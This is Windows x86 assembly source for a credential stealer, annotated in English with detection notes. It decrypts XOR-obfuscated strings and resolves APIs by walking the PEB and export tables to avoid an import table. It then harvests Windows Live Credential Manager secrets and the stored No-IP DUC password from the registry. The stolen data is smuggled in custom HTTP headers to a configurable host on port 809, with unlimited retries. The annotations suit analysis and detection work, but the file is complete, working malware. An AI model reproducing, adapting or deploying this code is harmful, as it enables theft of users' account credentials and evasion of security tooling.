; by
; y y yyy yyyyyyyyyyyyy
; y y y y
; y y yyyyyy y
; yy y y
; y y y
; y y y
; y yyyyyyy y
;Mail:ysk_sft@hotmail.com
; Build-time string obfuscation: while assembling, XORs every byte of the
; dsize-byte region at dstart with $17, so the .data strings below are not
; readable in the produced object. The runtime inverse is EncriptacionXOR
; (same key), which Main calls before anything else.
; ..key and ..shift are declared but not used.
macro encrypt dstart,dsize {
local ..char,..key,..shift
repeat dsize
load ..char from dstart+%-1        ; % = current iteration, 1-based
..char = ..char xor $17
store ..char at dstart+%-1
end repeat
}
format MS COFF                     ; 32-bit COFF object, linked externally
include 'win32ax.inc'              ; FASM Win32 macro set (proc/locals/stdcall/.if) and the constants used below
section '.text' code readable executable
public Main as '_Main'             ; exported with the C-style leading underscore
;-----------------------------------------------------------------------
; _Main -- entry point (no arguments).
; Flow, as visible below:
;   1. Deobfuscate the whole .data string block (var..finvar) in place.
;   2. Resolve kernel32 by walking the loader list (GetModuleHW) and
;      GlobalAlloc / LoadLibraryW from its export table (GetAddressFunction),
;      so the object needs no import table.
;   3. wsprintfA builds an HTTP request header in cCabezeras from the
;      cabezeras template, cArchivo ("\") and cHost.
;   4. MsnLiveGet / NoIpGet fill GBuffer; a non-zero result means data was
;      found and it is appended to the request as "MsnLive: " / "NIP: "
;      pseudo-header lines via ntdll strcat.
;   5. MandarDatos sends the request to cHost, TCP port 809.
; Detection notes: the network artefact is a GET to port 809 whose header
; block carries "MsnLive: " or "NIP: " lines after this User-Agent; the
; cleartext strings exist only in memory, after step 1.
; Writes ebx and edi without saving them.
;-----------------------------------------------------------------------
proc Main
locals
GBuffer dd ?                       ; 4048-byte scratch buffer filled by the collectors
cCabezeras dd ?                    ; [KTamaño]-byte buffer holding the HTTP request
endl
stdcall EncriptacionXOR,var,finvar-var ; undo the build-time XOR $17 (see the encrypt macro)
stdcall GetModuleHW,cKernel32
mov ebx,eax                        ; ebx = kernel32 base
stdcall GetAddressFunction,ebx,cGlobalAlloc
stdcall eax,GPTR,[KTamaño]         ; GlobalAlloc(GPTR, KTamaño): zero-initialised request buffer
push eax
pop [cCabezeras]
stdcall GetAddressFunction,ebx,cLoadLibraryW
mov edi,eax                        ; edi = LoadLibraryW
stdcall eax,cWSOCK32               ; LoadLibraryW(L"wsock32.dll"), used later by MandarDatos
stdcall edi,cUser32                ; LoadLibraryW(L"user32.dll")
stdcall GetAddressFunction,eax,cwsprintf
stdcall eax, [cCabezeras] ,cabezeras,cArchivo,cHost ; wsprintfA(buf, "GET %s HTTP/1.1 .. Host: %s .. User-Agent ..", "\", cHost)
stdcall GetAddressFunction,ebx,cGlobalAlloc
stdcall eax,GPTR,4048              ; GlobalAlloc(GPTR, 4048) for GBuffer
push eax
pop [GBuffer]
stdcall MsnLiveGet,[GBuffer]       ; Credential Manager entries -> GBuffer ("name::blob||" per entry)
.if eax <> 0
stdcall GetModuleHW,cNtdll
stdcall GetAddressFunction,eax,cstrcat
mov ebx,eax                        ; ebx = ntdll strcat from here on (kernel32 base no longer needed)
stdcall eax,[cCabezeras],CabezeraMsnLive ; append CRLF "MsnLive: "
stdcall ebx,[cCabezeras],[GBuffer]       ; append the collected entries
.endif
stdcall Zerar,[GBuffer] ,4048      ; clear the scratch buffer before the next collector
stdcall NoIpGet,[GBuffer]          ; No-IP DUC registry values -> GBuffer
.if eax <> 0
stdcall GetModuleHW,cNtdll
stdcall GetAddressFunction,eax,cstrcat
mov ebx,eax
stdcall eax,[cCabezeras],CabezeraNoIp    ; append CRLF "NIP: "
stdcall ebx,[cCabezeras],[GBuffer]
.endif
stdcall Zerar,[GBuffer] ,4040      ; note: 4040 here, 4048 above
stdcall GetModuleHW,cNtdll
stdcall GetAddressFunction,eax,cstrcat
stdcall eax,[cCabezeras],FinCabezeras    ; append CRLF "Connection: close" CRLF CRLF
stdcall MandarDatos, [cCabezeras],cHost,809,0 ; send to cHost:809; the last argument is an offset added to the cHost pointer
leave
ret
endp
;-----------------------------------------------------------------------
; Zerar(Puntero, Cantidad): zero-fill helper.
; The loop writes 0 to [Puntero+Cantidad] down through [Puntero+1], then
; the final store covers [Puntero] -- Cantidad+1 bytes in total.
; Preserves ecx and ebx; does not touch eax.
;-----------------------------------------------------------------------
proc Zerar,Puntero,Cantidad ; fills a memory range with zero bytes
push ecx
push ebx
mov ecx,[Cantidad]                 ; ecx = loop counter, runs from Cantidad down to 1
mov ebx,[Puntero]                  ; ebx = base address
.bucle:
mov byte[ebx+ecx],0                ; first iteration touches [Puntero+Cantidad]
loop .bucle
mov byte[ebx],0                    ; the loop stops before offset 0; cover it here
pop ebx
pop ecx
ret
endp
;-----------------------------------------------------------------------
; MandarDatos(cDatos, cIP, cPort, cCantidadASumar): sends cDatos over TCP.
; wsock32 exports are resolved by name at runtime (ObtenerDireccion), then:
;   WSAStartup -> socket(AF_INET,SOCK_STREAM) -> gethostbyname(cIP+offset)
;   -> connect(cPort) -> send(cDatos, Len(cDatos)) -> closesocket -> WSACleanup.
; Both the name resolution and the connect are retried with no attempt
; limit (SleepEx 1000 ms / 100 ms between tries), so a host running this
; repeats DNS queries for cIP and TCP connection attempts to cPort until
; one succeeds.
; Writes eax and ebx without saving them.
;-----------------------------------------------------------------------
proc MandarDatos,cDatos,cIP,cPort,cCantidadASumar
locals
WD WSADATA ?                       ; WSAStartup output
cWSOCKPOS dd ?                     ; wsock32.dll base (loaded earlier by Main)
cSock dd ?                         ; the TCP socket
cSin sockaddr_in                   ; destination address
endl
stdcall GetModuleHW,cWSOCK32
mov [cWSOCKPOS],eax
stdcall ObtenerDireccion,[cWSOCKPOS],cWSAStartup
stdcall eax,200,addr WD            ; WSAStartup(200, &WD); the version argument is literally 200
stdcall ObtenerDireccion,[cWSOCKPOS],csocket
stdcall eax,AF_INET,SOCK_STREAM,0  ; socket(AF_INET, SOCK_STREAM, 0)
mov [cSock],eax
stdcall HTONS ,[cPort]             ; ax = port in network byte order
mov [cSin.sin_family],2            ; 2 = AF_INET
mov [cSin.sin_port],ax
mov eax,[cCantidadASumar]
add [cIP],eax                      ; hostname pointer = cIP + cCantidadASumar
.Reintentar:
stdcall GetModuleHW,cKernel32
stdcall GetAddressFunction,eax,cSleepEx
stdcall eax,1000,FALSE             ; SleepEx(1000, FALSE) between resolution attempts
stdcall ObtenerDireccion,[cWSOCKPOS],cgethostbyname
stdcall eax,[cIP]                  ; gethostbyname(hostname)
cmp eax,0
jne @f
jmp .Reintentar                    ; NULL result: retry indefinitely
@@:
virtual at eax
.host hostent                      ; overlay the hostent layout on the returned pointer
end virtual
mov eax,[.host.h_addr_list]
mov eax,[eax]                      ; h_addr_list[0]
mov eax,[eax]                      ; first IPv4 address, as stored
mov [cSin.sin_addr],eax
.BConectar:
stdcall GetModuleHW,cKernel32
stdcall GetAddressFunction,eax,cSleepEx
stdcall eax,100,FALSE              ; SleepEx(100, FALSE) between connect attempts
stdcall ObtenerDireccion,[cWSOCKPOS], cconnect
stdcall eax, [cSock],addr cSin,16  ; connect(sock, &cSin, 16)
cmp eax,-1
je .BConectar                      ; SOCKET_ERROR: retry indefinitely
stdcall ObtenerDireccion,[cWSOCKPOS],csend
mov ebx,eax                        ; ebx = send
stdcall Len,[cDatos]
stdcall ebx,[cSock],[cDatos],eax,0 ; send(sock, cDatos, strlen(cDatos), 0); return value not examined
stdcall ObtenerDireccion,[cWSOCKPOS],cclosesocket
stdcall eax,[cSock]
stdcall ObtenerDireccion,[cWSOCKPOS],cWSACleanup
stdcall eax
ret
endp
;-----------------------------------------------------------------------
; HTONS(PUERTO): byte-swaps a 16-bit port (host -> network order) without
; importing the Winsock htons().
; Out: ax = swapped value; the upper 16 bits of eax are zero after the shift.
; Preserves ecx.
;-----------------------------------------------------------------------
proc HTONS,PUERTO:WORD ; same result as the htons API
push ecx
MOVZX EAX,[PUERTO]                 ; eax = 0000:hi:lo
XOR ECX,ECX
MOV CH,AL                          ; ecx = lo << 8
SHR EAX,8                          ; eax = hi
OR ECX,EAX                         ; ecx = (lo << 8) | hi
MOV AX,CX                          ; ax = swapped port
pop ecx
ret
endp
;-----------------------------------------------------------------------
; NoIpGet(cBuffer): reads the No-IP DUC account from the registry.
; RegOpenKeyExA(HKLM, "SOFTWARE\Vitalwerks\DUC", KEY_READ), then
; RegQueryValueExA "Username" and "Password" into cBuffer, laid out as
;   "<username>::<password>||"
; The Password value is base64-decoded in place before the separator is
; written (so the stored value is presumably base64 -- not verifiable here).
; Out: eax = 0 when advapi32 lacks RegOpenKeyExA, the key cannot be opened,
;      or Username cannot be read; on the success path eax is the value
;      handed to Zerar (4000 minus the decoded password length), which
;      Zerar leaves untouched -- Main treats any non-zero eax as "data found".
; Detection note: a read of HKLM\SOFTWARE\Vitalwerks\DUC\Password by a
; process other than the DUC client is the host-side artefact.
; Writes eax, ebx and edi without saving them.
;-----------------------------------------------------------------------
proc NoIpGet,cBuffer
locals
temp dd ?                          ; cbData in/out for RegQueryValueExA, set to 100 before each call
Result dd ?                        ; HKEY returned by RegOpenKeyExA
hAdvapi32 dd ?                     ; advapi32.dll base
endl
stdcall GetModuleHW,cAdvapi32 ; advapi32.dll base from the loader list
push eax
pop [hAdvapi32]
stdcall ObtenerDireccion,[hAdvapi32] ,cRegOpenKeyEx
cmp eax,0
jne @f
xor eax,eax ; API not present: return eax = 0
jmp .salir
@@:
mov [temp],100
stdcall eax,HKEY_LOCAL_MACHINE,LlabeNoIp,0,KEY_READ, addr Result ; open the key holding the DUC account
.if eax <> 0 ; open failed: return 0
xor eax,eax
jmp .salir
.endif
stdcall ObtenerDireccion,[hAdvapi32] ,cRegQueryValueEx
lea ebx,[temp]
stdcall eax,[Result],username,0,0,[cBuffer],ebx ; RegQueryValueExA(hKey, "Username", 0, 0, cBuffer, &temp)
.if eax <> 0 ; no value: return 0
xor eax,eax
jmp .salir
.endif
stdcall Len ,[cBuffer]
add [cBuffer],eax                  ; advance past the username
mov ax,word[puntos]
mov ebx,[cBuffer]
mov word[ebx],ax                   ; write "::"
inc [cBuffer]
inc [cBuffer]                      ; skip the separator
mov [temp],100
stdcall ObtenerDireccion,[hAdvapi32] ,cRegQueryValueEx
lea ebx,[temp]
stdcall eax,[Result],password,0,0,[cBuffer],ebx ; RegQueryValueExA(hKey, "Password", ...); return value not examined
stdcall Len ,[cBuffer]
stdcall base64decode,[cBuffer],[cBuffer],eax ; decode in place (source == destination)
stdcall Len ,[cBuffer]
mov edi,eax                        ; edi = decoded password length
add [cBuffer],eax
mov ax,word[palos]
mov ebx,[cBuffer]
mov word[ebx],ax                   ; write "||"
add [cBuffer],2
mov eax,4000
sub eax,edi                        ; eax = 4000 - password length
stdcall Zerar, [cBuffer],eax       ; clear the tail of the buffer; Zerar does not modify eax
.salir:
ret
endp
;-----------------------------------------------------------------------
; base64decode(source, destination, sourcelen)
; Decodes sourcelen/4 groups of 4 characters into 3 bytes each through the
; base64table lookup (255 = invalid character; '=' maps to 0, so padding
; decodes to zero bytes). Decoding runs forward, so source and destination
; may be the same buffer (NoIpGet relies on this).
; Each group is written with stosd (3 decoded bytes + one zero byte) and
; edi stepped back by one, so the zero byte is overwritten by the next
; group and the final group leaves one zero byte after the output.
; Out: eax = 0 on success, -1 at the first invalid character.
; On the success path esi, edi and ebx are restored; DF is cleared.
; The group counter is dec/jnz with no pre-check, so sourcelen must be >= 4.
;-----------------------------------------------------------------------
proc base64decode source:DWORD, destination:DWORD, sourcelen:DWORD ; base64 decoder
push esi
push edi
push ebx
mov esi, [source] ; esi <- source
mov edi, [destination] ; edi <- destination
mov ecx, [sourcelen]
shr ecx, 2                         ; ecx = number of 4-character groups
cld                                ; lodsd/stosd walk forward
;-------------[decoding part]---------------
@@outer_loop:
push ecx                           ; save the group counter
mov ecx, 4                         ; 4 characters per group
xor ebx, ebx                       ; ebx accumulates the 24-bit value
lodsd                              ; eax = next 4 input characters, first one in al
@@inner_loop:
push eax
and eax, 0ffh                      ; current character
mov al, byte[base64table+eax]      ; 6-bit value, or 255 for an invalid character
cmp al, 255
je @@invalid_char
shl ebx, 6
or bl, al                          ; append 6 bits
pop eax
shr eax, 8                         ; next character into al
dec ecx
jnz @@inner_loop
mov eax, ebx                       ; eax = 00:b0:b1:b2 (b0 most significant)
shl eax, 8                         ; b0:b1:b2:00
xchg ah, al
ror eax, 16
xchg ah, al                        ; -> 00:b2:b1:b0, i.e. b0,b1,b2,00 in memory order
stosd                              ; write the 3 decoded bytes plus a zero byte
dec edi                            ; the zero byte gets overwritten by the next group
pop ecx
dec ecx
jnz @@outer_loop
xor eax, eax                       ; success
jmp @@decode_done
;-------------------------------------------
@@invalid_char:
mov eax, -1                        ; error
@@decode_done:
pop ebx
pop edi
pop esi
ret
endp
;-----------------------------------------------------------------------
; MsnLiveGet(cBuffer): dumps Credential Manager entries matching
; L"WindowsLive:name=*" via CredEnumerateW(filter, 0, &lCount, &lCred).
; For every returned CREDENTIALW it appends "<target after prefix>::<blob>||"
; to cBuffer, narrowing the UTF-16 fields with UniToAscii. Offsets used:
; +8 (TargetName, advanced by 34 bytes = the 17 UTF-16 units of
; "WindowsLive:name=") and +28 (CredentialBlob, the stored secret).
; Out: eax = 0 when CredEnumerateW is missing or returns no entries,
;      TRUE after the last entry has been appended.
; Detection note: CredEnumerateW with a "WindowsLive:name=*" filter from an
; unexpected process is the host-side artefact.
; Writes eax, ebx, edi and si without saving them.
;-----------------------------------------------------------------------
proc MsnLiveGet,cBuffer
locals
hAdvapi32 dd ? ; advapi32.dll base
lCount dd ? ; number of credentials returned
lCred dd ? ; PCREDENTIALW array returned by CredEnumerateW
endl
stdcall GetModuleHW,cAdvapi32 ; advapi32.dll base from the loader list
push eax
pop [hAdvapi32] ; keep it in hAdvapi32
stdcall ObtenerDireccion,eax,cCredEnumerateW
cmp eax,0
jne @f
xor eax,eax ; API not present: return eax = 0
jmp .salir
@@:
stdcall eax,cred, 0, addr lCount,addr lCred ; CredEnumerateW(L"WindowsLive:name=*", 0, &lCount, &lCred)
cmp [lCount],0
jne @f
xor eax,eax ; no entries: return eax = 0
jmp .salir
@@:
mov ebx,[lCred]                    ; ebx -> current slot in the pointer array
.BucleQueSacaLasCuentas:
mov eax,dword[ebx]                 ; eax -> CREDENTIALW
add dword[eax+8] ,34               ; skip the "WindowsLive:name=" prefix (17 UTF-16 units)
; dword[eax+8] = TargetName (account name after the prefix)
; dword[eax+28] = CredentialBlob (secret)
stdcall UniToAscii,[cBuffer],dword[eax+8]
push eax
stdcall Len,[cBuffer]
add [cBuffer],eax                  ; advance past the name
pop eax
mov edi,[cBuffer]
mov si,word[puntos]
mov word[edi],si                   ; write "::"
add [cBuffer],2
.if dword[eax+28] <> 0
stdcall UniToAscii,[cBuffer],dword[eax+28] ; blob narrowed byte-wise (low byte of each UTF-16 unit)
.endif
stdcall Len,[cBuffer]
add [cBuffer],eax
mov eax,[cBuffer]
mov si,word[palos]
mov word[eax],si                   ; write "||"
add [cBuffer],2
dec [lCount]
.if [lCount] = 0
mov eax,TRUE                       ; all entries processed
jmp .salir
.endif
add ebx,4                          ; next pointer in the array
jmp .BucleQueSacaLasCuentas
.salir:
ret
endp
;-----------------------------------------------------------------------
; UniToAscii(ascii, unicode): narrows a NUL-terminated UTF-16 string by
; copying the low byte of every code unit (no real conversion: units above
; 0xFF lose their high byte). The terminating unit is copied too, giving a
; NUL-terminated byte string.
; Preserves eax, esi, edi.
;-----------------------------------------------------------------------
proc UniToAscii, ascii, unicode ; UTF-16 -> byte string, low byte of each unit
push eax
push esi
push edi
mov edi,[unicode]
mov esi,[ascii]
dec esi                            ; pre-step both pointers so the loop can advance first
sub edi,2
.bucle_:
inc esi
add edi,2
mov al,byte[edi]                   ; low byte of the current UTF-16 unit
mov byte[esi],al
cmp word[edi],00                   ; stop once the terminating unit has been copied
jne .bucle_
pop edi
pop esi
pop eax
ret
endp
;-----------------------------------------------------------------------
; ObtenerDireccion(hLib, cApi): GetProcAddress(hLib, cApi), where
; GetProcAddress itself is located with the hand-rolled export walker
; (GetAddressFunction on kernel32). Per the author's note it is used for
; the exports the custom walker does not find.
; Out: eax = GetProcAddress result (address or NULL).
;-----------------------------------------------------------------------
proc ObtenerDireccion,hLib,cApi ; resolver for the APIs the custom walker does not find
stdcall GetModuleHW,cKernel32
stdcall GetAddressFunction,eax,cGetProcAddress ; eax = GetProcAddress, resolved without an import table
stdcall eax,[hLib],[cApi]          ; GetProcAddress(hLib, cApi)
ret
endp
;Función que simula GetModuleHandleW
;-----------------------------------------------------------------------
; GetModuleHW(cName): GetModuleHandleW substitute that needs no import.
; cName = 0  -> returns the process image base (TEB -> PEB -> ImageBaseAddress).
; otherwise  -> walks the PEB load-order module list backwards from its tail
;               (PEB_LDR_DATA / LDR_DATA_TABLE_ENTRY offsets), comparing each
;               entry's BaseDllName buffer (+30h) with cName via compararW,
;               and returns that entry's DllBase (+18h).
; Out: eax = module base on a match. When the walk comes back to the
;      starting entry without a match it exits with compararW's last
;      result (1), not with 0.
; Detection note: resolving modules through fs:[30h] and the loader list
; instead of an import table is a common import-hiding pattern and is what
; a memory-scanning rule would key on.
;-----------------------------------------------------------------------
proc GetModuleHW,cName
push ebx edi esi
.if [cName] = 0
mov eax,dword [fs:18h]             ; TEB
mov eax,dword [eax+30h]            ; TEB->ProcessEnvironmentBlock
mov eax,dword [eax+8h]             ; PEB->ImageBaseAddress
jmp .salir
.endif
mov eax,[fs:30h]                   ; PEB
mov eax,[eax+0Ch]                  ; PEB->Ldr
mov edi,[eax+10h]                  ; InLoadOrderModuleList.Blink: last entry in load order
mov esi,dword[edi+30h]             ; esi = BaseDllName.Buffer of the starting entry (wrap-around marker)
.siguiente:
mov ebx,dword[edi+30h]             ; current entry's BaseDllName.Buffer
stdcall compararW,[cName],ebx      ; 0 when equal
.if eax <> 0
mov edi,[edi+4h]                   ; previous entry (Blink)
cmp esi,dword[edi+30h]
jne .siguiente
jmp .salir                         ; back at the start: no match, eax still holds compararW's 1
.endif
mov eax,dword[edi+18h]             ; DllBase of the matching entry
jmp .salir
.error:                            ; label is not referenced
xor eax,eax
.salir:
pop edi ebx
ret
endp
;Función que simula GetProcAddress
; LibHandle = Handle otorgado por GetModulehandle o LoadLibrary.
; Api = Nombre de la función .
; By YST
;-----------------------------------------------------------------------
; GetAddressFunction(LibHandle, Api): GetProcAddress substitute that parses
; the module's PE export directory directly (no imports, no loader calls).
;   e_lfanew (+3Ch) -> "PE" check -> export directory RVA (NT headers +78h)
;   -> AddressOfNames (+20h), NumberOfNames (+18h), AddressOfFunctions (+1Ch).
; Walks the name table comparing each name with Api (comparar returns 0 on
; a match) and returns AddressOfFunctions[name index] + LibHandle. The
; function table is indexed with the name index directly -- no
; AddressOfNameOrdinals read is visible -- so only exports whose ordinal
; equals their name position resolve correctly (ObtenerDireccion exists for
; the rest).
; Out: eax = function address, or NULL when LibHandle is NULL, the "PE"
;      signature is missing, or the names are exhausted.
; Preserves ebx edx edi ecx esi.
;-----------------------------------------------------------------------
proc GetAddressFunction,LibHandle,Api
locals
AddressOfNames dd ?                ; VA of the export name pointer table
AddressOfFunctions dd ?            ; VA of the export address table
endl
push ebx edx edi ecx esi
mov eax,[LibHandle]
cmp eax,NULL
je .Error
mov ebx, dword[eax + 03Ch]         ; e_lfanew
add ebx,eax                        ; ebx -> IMAGE_NT_HEADERS
cmp word[ebx],"PE"
jne .Error
mov esi,dword[ebx+078h]            ; esi = export directory RVA (DataDirectory[0])
mov ebx,esi
add ebx,eax                        ; ebx -> IMAGE_EXPORT_DIRECTORY
push dword[ebx+20h]
pop [AddressOfNames]
add [AddressOfNames] ,eax          ; RVA -> VA
mov ecx,dword[ebx+018h]            ; ecx = NumberOfNames
xor edi,edi                        ; edi = name index
add eax ,esi
push dword[eax+1ch]
pop [AddressOfFunctions]
sub eax,esi
add [AddressOfFunctions] ,eax      ; RVA -> VA
.encontrar:
dec ecx
mov eax,edi
rol eax,2                          ; index * 4
add eax,[AddressOfNames]
mov eax, dword[eax]                ; name RVA
add eax, [LibHandle]               ; name VA
inc edi
stdcall comparar, [Api], eax       ; 0 when the names match; comparar preserves ecx
cmp ecx,NULL
je .Error                          ; names exhausted (checked before the compare result)
cmp eax, 0
jne .encontrar
dec edi                            ; back to the matching index
rol edi,2                          ; * 4
mov eax,edi
add eax, [AddressOfFunctions]
mov eax, dword[eax]                ; function RVA
add eax,[LibHandle]                ; function VA
pop esi ecx edi edx ebx
ret
.Error:
xor eax,eax ; NULL
pop esi ecx edi edx ebx
ret
endp
;Función que compara 2 cadenas en Unicode.
;-----------------------------------------------------------------------
; compararW(SRC, DST): compares two NUL-terminated UTF-16 strings.
; Counts SRC in 16-bit units (repnz scasw, terminator included) and then
; compares that many BYTES of SRC and DST (repz cmpsb) -- i.e. only the
; first half of SRC, byte-wise. Presumably enough to tell apart the module
; names this file looks up; it is not a full wide-string compare.
; Out: eax = 0 when the compared bytes are equal, 1 otherwise.
; Preserves edi ecx esi; relies on DF being clear.
;-----------------------------------------------------------------------
proc compararW ,SRC,DST
push edi ecx esi
mov ecx,-1
mov edi,[SRC]
mov ax,0000
repnz scasw                        ; find the UTF-16 terminator of SRC
mov eax,ecx
not eax                            ; eax = number of 16-bit units scanned, terminator included
mov ecx,eax                        ; reused as a byte count for cmpsb
mov esi,[SRC]
mov edi,[DST]
repz cmpsb                         ; compare ecx bytes
mov eax,1
jnz .Next                          ; mismatch: eax = 1
dec eax                            ; equal: eax = 0
.Next:
pop esi ecx edi
ret
endp
;Función que cifra con un xor $FF cada byte de una cadena
; cCadena = Puntero de cadena a cifrar
; cTTamaño = Tamaño de cadena a cifrar .
; By YST
;-----------------------------------------------------------------------
; EncriptacionXOR(cCadena, cTamaño): XORs cTamaño bytes at cCadena with $17
; in place. Runtime inverse of the build-time `encrypt` macro (the header
; comment above this proc says $FF; the code below uses $17). Main applies
; it to var..finvar first, so the module/API names, registry path,
; credential filter, HTTP template and base64 table are cleartext in memory
; only after this call.
; Out: eax = cCadena + cTamaño - 1 (address of the last byte processed).
; Preserves ebx.
;-----------------------------------------------------------------------
proc EncriptacionXOR,cCadena,cTamaño
push ebx
xor ebx,ebx
mov ebx,[cTamaño]                  ; ebx = remaining byte count
jmp .Start
.Start:
mov eax,[cCadena]
inc ebx                            ; pre-increment: the loop decrements before testing
dec eax                            ; pre-decrement: the loop increments before use
.bucle:
dec ebx
cmp ebx,0
jbe .salir                         ; count exhausted (unsigned compare, exits exactly at 0)
inc eax
xor byte[eax],$17
jmp .bucle
.salir:
pop ebx
ret
endp
;-----------------------------------------------------------------------
; Len(cCadena): strlen for a NUL-terminated byte string.
; Out: eax = number of bytes before the terminator.
; Preserves ecx edi; relies on DF being clear.
;-----------------------------------------------------------------------
proc Len,cCadena ; string length
push ecx edi
mov ecx,-1
mov edi,[cCadena]
mov al,0
repnz scasb                        ; scan to the terminator
mov eax,ecx
not eax                            ; bytes scanned, terminator included
dec eax                            ; exclude the terminator
pop edi ecx
ret
endp
;Función que compara 2 cadenas en ascii.
;-----------------------------------------------------------------------
; comparar(SRC, DST): compares two NUL-terminated byte strings.
; Measures SRC (terminator included) and compares that many bytes of SRC
; and DST, so DST must match SRC up to and including the terminator.
; Out: eax = 0 when equal, 1 otherwise.
; Preserves edi ecx esi; relies on DF being clear.
;-----------------------------------------------------------------------
proc comparar ,SRC,DST
push edi ecx esi
mov ecx,-1
mov edi,[SRC]
mov al,0
repnz scasb                        ; find SRC's terminator
mov eax,ecx
not eax                            ; eax = strlen(SRC) + 1
mov ecx,eax
mov esi,[SRC]
mov edi,[DST]
repz cmpsb                         ; compare ecx bytes, terminator included
mov eax,1
jnz .Next                          ; mismatch: eax = 1
dec eax                            ; equal: eax = 0
.Next:
pop esi ecx edi
ret
endp
section '.data' data readable writeable
; Everything between var and finvar is XORed with $17 at assembly time by
; the `encrypt` macro (invoked on the last line of this file) and restored
; in place by EncriptacionXOR at the top of Main. The cleartext values
; below are therefore absent from the built object and present in memory
; once Main has started.
var:
cWSOCK32 du 'wsock32.dll',0        ; UTF-16 module names (LoadLibraryW arguments / GetModuleHW compare)
cKernel32 du 'kernel32.dll',0
cAdvapi32 du 'ADVAPI32.dll',0
cNtdll du 'ntdll.dll',0
cUser32 du 'user32.dll',0
cGetProcAddress db 'GetProcAddress',0 ; export names resolved by hand, no import table
;General
cLoadLibraryW db 'LoadLibraryW',0
cGlobalAlloc db 'GlobalAlloc',0
cstrcat db 'strcat',0              ; taken from ntdll
cwsprintf db 'wsprintfA',0         ; taken from user32
cSleepEx db 'SleepEx',0
;Separators used in the collected data ("name::secret||")
palos db '||',0
puntos db '::',0
;Registry access
cRegOpenKeyEx db 'RegOpenKeyExA',0
cRegQueryValueEx db 'RegQueryValueExA',0
;No-IP DUC keys, read under HKLM
LlabeNoIp db 'SOFTWARE\Vitalwerks\DUC',0
username db 'Username',0
password db 'Password',0           ; value is base64-decoded by NoIpGet
;Windows Live credentials
cCredEnumerateW db 'CredEnumerateW',0
cred du 'WindowsLive:name=*',0     ; CredEnumerateW target filter (UTF-16)
;Web connection
cHost db 'localhost',0             ; destination host, resolved with gethostbyname; port 809 is set in Main
cArchivo db '\',0                  ; request path -> "GET \ HTTP/1.1"
cabezeras:                         ; wsprintfA template; collected data is appended after the User-Agent line
db "GET %s HTTP/1.1",13,10
db "Host: %s",13,10
db "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",0 ; no trailing CRLF; the next strcat supplies it
FinCabezeras db 13,10,"Connection: close",13,10,13,10,0 ; terminates the header block
CabezeraMsnLive db 13,10,'MsnLive: ',0 ; pseudo-header carrying the Credential Manager data
CabezeraNoIp db 13,10,'NIP: ' ,0   ; pseudo-header carrying the No-IP data
KTamaño dd $+100-cabezeras         ; template size + 100: the GlobalAlloc size of the request buffer in Main
csocket db 'socket',0              ; wsock32 export names
cgethostbyname db 'gethostbyname',0
cWSAStartup db 'WSAStartup',0
cconnect db 'connect',0
csend db 'send',0
cclosesocket db 'closesocket',0
cWSACleanup db 'WSACleanup',0
;Base64 decode table indexed by character code; 255 = invalid
base64table db 43 dup (255)        ; 0..42
db 62,255,255,255,63,52,53,54,55,56,57,58,59,60,61,255 ; '+'=62, '/'=63, '0'..'9'=52..61
db 255,255,0,255,255,255,0,1,2,3,4,5,6,7,8,9,10,11,12,13 ; '='=0 (padding decodes to zero bytes), 'A'..=0..
db 14,15,16,17,18,19,20,21,22,23,24,25,255,255,255,255 ; ..'Z'=25
db 255,255,26,27,28,29,30,31,32,33,34,35,36,37,38 ; 'a'..=26..
db 39,40,41,42,43,44,45,46,47,48,49,50,51 ; ..'z'=51
db 132 dup (255)                   ; 123..254
finvar:
encrypt var,finvar-var             ; build-time obfuscation of everything above (see the macro at the top)




























